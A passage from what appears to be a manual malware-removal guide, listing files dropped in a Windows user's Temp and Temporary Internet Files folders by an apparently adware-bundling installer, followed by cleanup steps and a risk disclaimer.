   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.